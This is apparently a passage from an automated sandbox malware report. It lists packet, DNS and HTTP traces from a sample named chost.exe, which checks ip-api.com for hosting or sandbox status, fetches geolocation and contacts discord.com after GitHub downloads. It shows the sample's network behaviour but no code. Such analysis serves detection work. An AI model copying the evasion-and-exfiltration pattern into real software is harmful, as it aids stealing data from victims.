                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.097382069 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.097388029 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.097426891 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.100445032 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.100466967 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.100693941 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.100697994 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.100748062 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.108650923 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.230408907 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.230431080 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.230596066 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.230616093 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.230657101 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233696938 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233721018 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233750105 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233755112 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233776093 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.233788013 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.236973047 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.236989975 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.237036943 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.237041950 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.237076998 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.279149055 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.279166937 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.279243946 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.279251099 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.279287100 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282394886 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282411098 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282450914 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282455921 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282464027 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.282490969 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285574913 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285597086 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285630941 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285634995 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285665989 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.285676003 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.289515972 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.289536953 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.289602995 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.289608002 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.289644003 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292701006 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292722940 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292753935 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292757988 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292782068 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.292799950 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.301645994 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431392908 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431423903 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431476116 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431499004 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431510925 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.431597948 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434580088 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434603930 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434640884 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434655905 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434674978 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.434691906 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.437738895 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.437757969 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.437810898 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.437829018 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.437839985 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.440215111 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.471291065 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.471323013 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.471431971 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.471455097 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.471493959 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.474525928 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.474545002 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.474606991 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.474628925 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.474669933 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478360891 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478384018 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478414059 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478419065 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478445053 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.478456974 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.481672049 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.481693029 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.481743097 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.481748104 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.481784105 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482338905 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482383013 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482388973 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482424974 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482450008 CET44349733185.199.109.133192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.482480049 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:42.495857954 CET49733443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.016077995 CET4974680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.136084080 CET8049746208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.136162996 CET4974680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.136311054 CET4974680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.255980968 CET8049746208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:58.243077993 CET8049746208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:58.243760109 CET4974680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:58.364078045 CET8049746208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:58.364300966 CET4974680192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.760173082 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.880259037 CET8049760208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.881127119 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.881782055 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:19.001698971 CET8049760208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.054543972 CET8049760208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.108782053 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.693026066 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.693072081 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.695103884 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.738627911 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.738648891 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.954122066 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.954598904 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.954628944 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.955631018 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.955718994 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957241058 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957304001 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957568884 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957575083 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957665920 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957695961 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957743883 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957748890 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957787991 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957809925 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957876921 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957886934 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957952023 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.957962036 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958007097 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958018064 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958070993 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958081961 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958164930 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958173990 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958218098 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958225965 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958241940 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958249092 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958264112 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958271980 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958277941 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958277941 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958287954 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958292007 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958297014 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958307028 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958318949 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958324909 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958331108 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958337069 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958439112 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958446026 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958462000 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958468914 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958478928 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958492041 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958499908 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958506107 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958515882 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958523035 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958529949 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958534002 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958540916 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958545923 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958559036 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958564997 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958575010 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958580017 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958611965 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958616972 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958628893 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958642006 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958673000 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958697081 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958709002 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958728075 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958728075 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.958748102 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:21.959027052 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:22.003330946 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475667953 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475774050 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475805044 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475827932 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475877047 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475907087 CET44349766162.159.138.232192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475922108 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.475950003 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.476836920 CET49766443192.168.2.4162.159.138.232
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.814264059 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.934442997 CET8049760208.95.112.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:23.934504032 CET4976080192.168.2.4208.95.112.1
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:15.385344982 CET5559153192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:15.523461103 CET53555911.1.1.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.142340899 CET5801253192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.281337023 CET53580121.1.1.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:53.812779903 CET5714153192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:54.212796926 CET53571411.1.1.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:56.864687920 CET5711153192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.012403011 CET53571111.1.1.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.620865107 CET4994253192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.759346962 CET53499421.1.1.1192.168.2.4
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.549513102 CET5555953192.168.2.41.1.1.1
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET53555591.1.1.1192.168.2.4
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:15.385344982 CET192.168.2.41.1.1.10xdc36Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.142340899 CET192.168.2.41.1.1.10x2ae8Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:53.812779903 CET192.168.2.41.1.1.10x7edStandard query (0)blank-7uov3.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:56.864687920 CET192.168.2.41.1.1.10xbb50Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.620865107 CET192.168.2.41.1.1.10x2282Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.549513102 CET192.168.2.41.1.1.10xc545Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:15.523461103 CET1.1.1.1192.168.2.40xdc36No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.281337023 CET1.1.1.1192.168.2.40x2ae8No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.281337023 CET1.1.1.1192.168.2.40x2ae8No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.281337023 CET1.1.1.1192.168.2.40x2ae8No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:18.281337023 CET1.1.1.1192.168.2.40x2ae8No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:54.212796926 CET1.1.1.1192.168.2.40x7edName error (3)blank-7uov3.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.012403011 CET1.1.1.1192.168.2.40xbb50No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.759346962 CET1.1.1.1192.168.2.40x2282No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET1.1.1.1192.168.2.40xc545No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET1.1.1.1192.168.2.40xc545No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET1.1.1.1192.168.2.40xc545No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET1.1.1.1192.168.2.40xc545No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.686321974 CET1.1.1.1192.168.2.40xc545No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      • github.com
                                                                                                                                                                                                                                      • objects.githubusercontent.com
                                                                                                                                                                                                                                      • discord.com
                                                                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.449746208.95.112.180280C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:57.136311054 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                      Dec 5, 2024 19:36:58.243077993 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                      Data Ascii: false


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.449760208.95.112.180280C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:18.881782055 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                      Dec 5, 2024 19:37:20.054543972 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 05 Dec 2024 18:37:19 GMT
                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 204
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                      X-Rl: 44
